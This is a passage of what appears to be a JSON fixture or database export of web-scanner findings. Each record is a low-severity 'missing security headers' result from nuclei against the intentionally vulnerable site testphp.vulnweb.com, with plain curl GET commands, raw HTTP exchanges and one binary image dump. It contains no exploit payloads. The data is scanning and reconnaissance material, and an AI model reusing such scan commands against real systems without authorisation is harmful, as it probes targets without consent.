PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<html>\r\n<div id="content">\r\n\t<div class='product'><table><tr><td width='180px'><img src='images/1.jpg'></td><td width='400px'><a href='Details/network-attached-storage-dlink/1/'>Network Storage D-Link DNS-313 enclosure 1 x SATA</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/network-attached-storage-dlink/1/'>Price<br>359 &euro;</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/2.jpg'></td><td width='400px'><a href='Details/web-camera-a4tech/2/'>Web Camera A4Tech PK-335E</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/web-camera-a4tech/2/'>Price<br>10 &euro;</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/3.jpg'></td><td width='400px'><a href='Details/color-printer/3/'>Laser Color Printer HP LaserJet M551dn, A4</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/color-printer/3/'>Price<br>812 &euro;</a></td></table></tr></div></div>\r\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 808, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36' 'http://testphp.vulnweb.com/cgi-bin/status'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin/status", + "discovered_date": "2024-11-13T02:42:04.366Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin/status HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 809, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2", + "discovered_date": "2024-11-13T02:42:04.563Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 810, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L", + "discovered_date": "2024-11-13T02:42:04.748Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 811, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01", + "discovered_date": "2024-11-13T02:42:04.928Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 812, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3", + "discovered_date": "2024-11-13T02:42:05.122Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 813, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3", + "discovered_date": "2024-11-13T02:42:05.301Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/color-printer/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 814, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/pictures/4.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/4.jpg.tn", + "discovered_date": "2024-11-13T02:42:05.486Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/4.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4615\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:58 GMT\r\nEtag: "4dca64a1-1207"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0002\u0003\u0001\u0001\u0001\u0001\u0004\u0005\u0003\u0006\u0002\u0001\u0007\b��5\u0010\u0002\u0002\u0001\u0003\u0003\u0002\u0005\u0002\u0005\u0003\u0005\u0001\u0001\u0002\u0003\u0011\u0004\u0012!\u00051A\u0013Q\u0006"aq�\u0014�#2B��R��%3���b��\u001a\u0001\u0002\u0003\u0001\u0001\u0001\u0003\u0002\u0005\u0004\u0006��0\u0011\u0002\u0002\u0001\u0003\u0001\u0006\u0005\u0003\u0005\u0001\u0001\u0002\u0003\u0011\u0012!1A\u0004\u0013"2Qq\u0005a���3��\u0014#Rb����\f\u0003\u0001\u0002\u0011\u0003\u0011?K4�5���\u001d�Ô\u0012I�?�#Y6��^�s`\u001f��# 2�#Ag��&V\u0016\u000f���:����'���02t��>\u001cnX3P�W��s��D�-���#�&8�3���q�\u0011�A�4\t�����0+���F�!�4�"��#�)c�\u0002�\u001b�zTZ��Wo\u0015�<s\r��\u00159D��&�\tRտ��\u000b�kZ$�������Z��>�{�rB�2�]�U]�wy \u001f\u001d���\u0010~�\r\u0006�K��ۊ�k�~����8\u000f��~fI\t\u001b�\u0015D\u001e���\u001d<�+\u0014(�v\u0002�j\u0003�?(Xi�|��RZ\u001e�C��o�.\u001e)w ! 3n\u000b�\u0013E���agU˔#BX�\u0002����=M���\u001a�}�\u0006�\u0002�=��\u001c��ca̭I���!�\u0003�N�Y�\u0019�0UdK��\b'��U����m��^>�Q��\u0012*��Q�\u000f\u001ac\u001c�\u0005�F���*�\\�4����ՆP\u0007<~t��U\u0014�2�<�gz��\u000f$Y���e�\u0006�?3\u0003�\n<v���X\u000e`U,p&�7�C\u0017�cW\u0006hP3/��[=�?�f\u001aL���"��ʑ��r�,�\u0015�*�\b.�"�$�\u0016{�\u0018="l����v��l�<�U#��I�r�x��ֶ�/�A�\u0015�C� BĒhj�-�g����\u0007�Г4���CL�\u0018\b��(�h�\u000by\u001c�B�\u0017�f&<pƱ�\u001a�(��(\u0001�5\\*\u0005\n�q�:��\u001bE\u0016&\\�����Q�\u0013�utg��}����\u0003��\u0019?��\t\u0014��@�\u001e,�����鼓n]/���U܄���Z\u0007��:[�ԃdK\u0004��e'bHl���s]������:\u000e�\u001c�ގ�9�?��U\u0010�)���:�\u0003+P\u0004��aF�X�<\u001b≩��0A��\u0003��X]O!�\u001a\u0003���A�H����6���{\u001f�T6�Ǭgvl�\u001e�[���X\u001c����\u0007=���o�M��/}f����W�\bn��8���\u0016"I�/A\u001b\u0005�������<��uy"R�ŀ���������\n\u001cԺ�t���,孨\u0011�P�A�\r��\u001a+3;ч��F;T{��[�����\u0016�V�6�uL��e��\nۈ,YX���?��N:.*b@����Q5}�������\u0007Ցi��}�������\n;��ד�h��/�Ӂ���9hw\u001f[���\\\\92_w��\u0010��\u0018�\u000b��\u001f�'��w3��8\u0001Yop\u0006ڂ�l�+C���:��r�t`zLV�A�|\u001f�\u0003��\u0002;\u0017�D�mm���\f̾���@�B7)��2�H��Ǜ�\\\u0011VF�};�'��L*@ۈV4O�ߑu��p1��ُ\u0018E�hw>��?]<��\u001fM\u0010�L�f�Sa\fƌ\n}t|_���15F����\u000e�\u0015\u000fSD\u001d^�\\��\t(\u001cX�j�:�:�\f�\u0018�y\u0007]�\u001fm#��`��S#*\b�@f\u000e�\u0015_sΪ\u001dy^L��\t�1Ŵ���k�7|7\u0015|}E���#3�#29�r8`{Q�΢\u000f�!�F$e۸�\u0018Ճ��<w\u0014k��uFN\u0013㱓\r�Ѱ��\u001d��·l�U&�r=��GϿ���ͦ�4�:�9�C���O��\u0015Z\u0012|�\\�$�\u0016b\u0015bI \n\u001c���^uT��f!��!�V��Uoɮkށ5�\u001e�\t�W�3(,�~`�F������k,���o4��r80����3��7Uλ���\u0015\u0001��;�\u001et�ى�����\b>ڂ^E����M�����@\u001as�=ŘC�\u0001�(�p�˘ϐ���)��"�<�0�z�7ȡ����yI\u0004b��{��8c��s=%A�&h�u�-�\u0001���3��f�\u0011���k�#��\b\u001d�滊҈D��z��+���O��cP\u0007a�x\u001fm<3Y��g�%\u001b�������"a,�|���k\u001e\u0001�kM�\u0015h\u000eݴ�\u0019UG}^z�\u0011r�(\u001e�k���\u0014N&f���4p����`<��.\u000f�Rf\u000b\u001cr��LE��\u0004w�a�\u0013;�d�$X�\u0018�o�($���A\u001e���\\���t��[��q'P�\u0014/,����I�\u001a\u001e_�q��#74I`E-{�?��F�\u0011|?��\u001eJL\u0015\f��.@!d\u0003�\u0006���oO��me��t��1���8 �5�>��~u\u0001c�B�93����pS\u0019\b���\u0003nu䊢;P����S'&N��2"���\u0006W��G�<��\u0011‚ǎIZ�l?��\u000f\u001b\u0010�\u0005YV�c\fB�\u0015��\u001am�Ӡ�%H�DU�ÿ���\r$�dր�D��bu\u0003�,�2\u001c��匨X���!,�\u0018�\u0017d\u0011\\�\u001ac��\u001b����dIe�(\u001fP�IT�qUVŅ�<\u000f�:�E\n�8�H�x�Um+�\u0006֟���p�_P�'�#��\u001a\u0007*e�9\u0004r\u0015\u000e�[k0��}�P~�L�V'\u00042���<��A�v��H}x��\u0013_�����\u0019L�B��X��B\u0014\u0005RV@K\u0012�KpG�\u000bDrh��3ʞN�xZ�����\u0006��VyY�o�w\u0010\u0016��\u001a�\u0011L�"���\u0005\u0004�s��s�>�y�m6���8��K0�"X��[Q�\u0016\u000bE�$�#q�g�\u001ck±�Ħ�*�һ�\fy#m\u000e,7�6\u0001��}#�\u001c���,����U��6ڀ���FGs��8\u001bZ�Zڋ�t�\u0017�,�\u001a��z�Wj7���UR��s@�\u000e\u0015\u0012\f�A�j����\u0013,H;�%\n��\u0016,_o���^��]�0�G�6��\u0014�n�\u001d�:�*_\\��1y�|��\u0004aM�v�F�B�_j��(�\u0006��o^���\\\r�����23\u001e�e�\u001d\u0013p\u0004�\u0004�\u0007�<\u000f�\u001a�3�$\u0003���\u0007��m\u0005�\u001cKF�>羝c\u0015\u0015ڵ���'\u0013\u001e��v\\�� �͖�䊾�(�<��8}\u000e\u0012�g&m����#��\u001f�����u��4Ǒx�N\u0015/]�s��\u000e�ohN/O�y1!n9e��7�\u0018�(�\u0006�Ǖ}��a\f����\u0004��a\n\u0001㶎�@ \u001f���ƍ��\u0007Τ���\u0017�\u0010@�18��\u001d\u0017\u001bX\u001e�BH\\c������܂4B\u001e~�\\։\u0004��?MP��I\r��ݹ��z���I� wfc�\u0015\u0014Y��@{\u0001��4ר.Yp�4E\n#�V$|�\u001bo4l]\u001e;���̼KT2wT��\u0013�\u001b?1���\u001e\u0007�IuR<+7������!{\u0010O�\u0013\u000e�3Y\u0016D�cb\u0003�a[�\u0018X\u0006��\u0001�ڹ\u00122[a�\u0007������\u000e\\,eґAU!@�߸\u001c�7ި{k\u000f��}Y����٢�\f\u0018ϰ|\u000f��_\u000f┃\u001f�ފ%\rD_'r��\u0004W\u0017ߛ�1�\u001bu\u0015�̝�(��]�T\u0016�l��Ln��\u0015Wܒöc#v8�9m\\��\u001bQ�Bֈ�]��^�9\u0001�.ϕ���N�ş��ן���l�&����p72��ܮ\t\u001f�T��n;\\M\u0005&�er�\u0006�E�n�Q<v<X44:\u0002Ɖ�{��h�@G��U��Q���1�O�Y�u��0ر\u0016p7\u001d���^O���������^�WƂ�,�N�N��I�L�:�%\t��������d\t�\fL���P�\u001d\u0016\u001c�#\r1eC`m\u000bb��U���ǁE&&zez���\u0018(P�[�\u001b6�7F����p5~\u0014��\u0001FR=��|`\rk�T��e�h�>/�H�}Y\\��qH�G�\u0001~/p�o����&���\u001a)V4�\u0004J�\u000e��\u0018�E\n<��^�ֆ\b�\u0003�\u001d\f �����̯~O L�?W��#�VV�f�dJ2P;��;�U\n�Y���:�x\u001d>6�7�-��V2ށ,F�7\u000f��أ}�j#�R;\r\\�>\u0016]�1�p<��>�w��1\f\u001f\u0015��4%�\u001e�V(��捀A\u0006��{���\u001f�P�\u000e>T�\u0015�r\u0002:�b�\u00057`\u001e\t����ӡb��#GUz�\u000e�h\n\u0003m�\u0001�@d�\u001b�4\u00016��x�<J\u0002�c�)a`\u001a&�w��\t\u0001����~ M�n�u����3�{\u001a\u0004�{���Lq��,��\\�\t��SI�S{\u001b�G�\u000f���|;!�\u0010���&r.�*�T[\u000e~m�h_��F�\u001d\u0003��VwM��9�I�4��ƕ\u0003!<w#m��}��\u0016\u000eO"@�zϞ�<p#3��)=\\�\tP���[���0�!\f��#J״�`S�<|��W�1�ۜ�H",h*�:S)}��u�b�p����D#\u0001{�\u001a��B�\u0006�;��4X�\u000b~M\u0002k�\u000e�?O���6@BѻF�\u001c:�5`�D\u001a���m\u0005�\n�H��\u0003w\u0002�����bj\\�\u0007��t��]���x�Z3HСD%����T�\u0017B�\u001e��v��\u0002��[�B>cc�u�P�|���˃d����\u0015����\u0016@;\u001et���I q���\u001c|���J���CL��1�%@�B��\b\u0004�5�\u001b\u0017V<�8��#�Q\u001364�E#Fɹ\u0018���k\u000e<\u0010H#�$jΒޤ~���S�������Z�:\u000f\u001d'5����zs;�Ӥ��6�\r\u0015$i�⤠nE?q���sK\u0019h\u0018�( �5d]_﫺fw�L\u0019$�k�G�\\��ЧO��m�1�����\u000e��H���\n��x\u0004]�}���<���$0ώ��\u0010�B7314\u0015Tr����c�j���\u001aJ�]A\u0017tG�\u0007L����s�嶰g�8��W\u001f"F�\\\t\u0013�S��_c�:���GYy�\u0002z��\u0011;U���\u0001I��]�w�گ�d�t��Xs\u001d�fW��\u001c���x\u0004X�/�W����D\u0005\u0015�C7�U����p+β]\u001b�<l�}Rޒ\u000b�C]�\u0007����@�bN�"20e"�\u0006�\u001a� �\u0014�T��\u0011�>8�\b�����������Q��\u0010N�;�\u001a�b\u0007ƺQgV��^5�e�B\u0004��Ƞ\u001e5��$�Ա�؟I�\u0012\u0001�������u�_���\u001d��~�\u0018Ѫ��Ҝh���1�A\u0013�\u001bA�����/����_�U�cV��\u0007�m_�\u00188S�@����SSUn\u001b��p>Oβ�\u0001���3�\u000fU����\ba�\\��SSV>E�J�����,u\u0006���:�\u001cO\u0003�\u00048B������Ӝef}$�\u0006=e�\tf˗��Z�m���ε���\u001a��)�\u0010\\1a\u0002\u001f\u0012�;k��\u0018��\b�����ՌX�ez�\u0004\u0011u���������=F\u0006�,\u001d��\u0004�菅sr'N�,�10亠�Ty�ۏmMM$y�='[oW��3W��T��}'\u001f+$ ��$( p�{�5���ښ�a�r�&\u0018�ͫ�󩩮\u000ba\u0013��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 815, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51' 'http://testphp.vulnweb.com/cgi-bin/1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin/1", + "discovered_date": "2024-11-13T02:42:05.672Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin/1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 816, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 